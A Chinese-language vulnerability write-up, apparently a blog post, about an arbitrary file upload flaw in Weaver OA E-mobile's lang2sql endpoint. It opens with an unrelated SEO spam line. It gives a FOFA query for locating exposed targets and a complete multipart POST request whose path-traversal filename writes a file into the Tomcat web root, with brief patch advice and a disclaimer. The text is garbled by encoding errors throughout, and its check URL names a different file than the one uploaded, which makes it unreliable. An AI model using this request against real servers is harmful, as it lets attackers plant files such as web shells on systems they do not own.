ui培訓(xùn)設(shè)計培訓(xùn)班簡陽seo排名優(yōu)化培訓(xùn)
簡介
泛微OA E-mobile系統(tǒng) lang2sql接口存在任意文件上傳漏洞,由于后端源碼中沒有對文件沒有校驗,導(dǎo)致任意文件上傳。攻擊者可利用該參數(shù)構(gòu)造惡意數(shù)據(jù)包進(jìn)行上傳漏洞攻擊。
漏洞復(fù)現(xiàn)
FOFA語法:
title="移動管理平臺-企業(yè)管理"
頁面訪問如下:
影響的版本偏系統(tǒng)版本比較老一點的系統(tǒng)
POC:
/emp/lang2sql?client_type=1&lang_tag=1
拼接URL進(jìn)行訪問,不存在該文件可能返回404頁面
該文件若存在可嘗試進(jìn)行利用驗證
訪問該文件存在頁面如上
漏洞驗證:
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: IP
User-Agent: Mozilla
Accept: text/html
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 205
Content-Type: multipart/form-data;boundary=----test
------test
Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/test.txt"
1234
------test--
嘗試訪問:
http://ip:port/text.txt
文件上傳成功
修復(fù)建議
-
廠商已提供漏洞修補(bǔ)方案
-
升級至新版本
免責(zé)聲明
請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任。工具來自網(wǎng)絡(luò),安全性自測,如有侵權(quán)請聯(lián)系刪除。本次測試僅供學(xué)習(xí)交流使用,如若非法他用,與平臺和本文作者無關(guān),需自行負(fù)責(zé)!
結(jié)語
沒有人規(guī)定,一朵花一定要成長為向日葵或者玫瑰。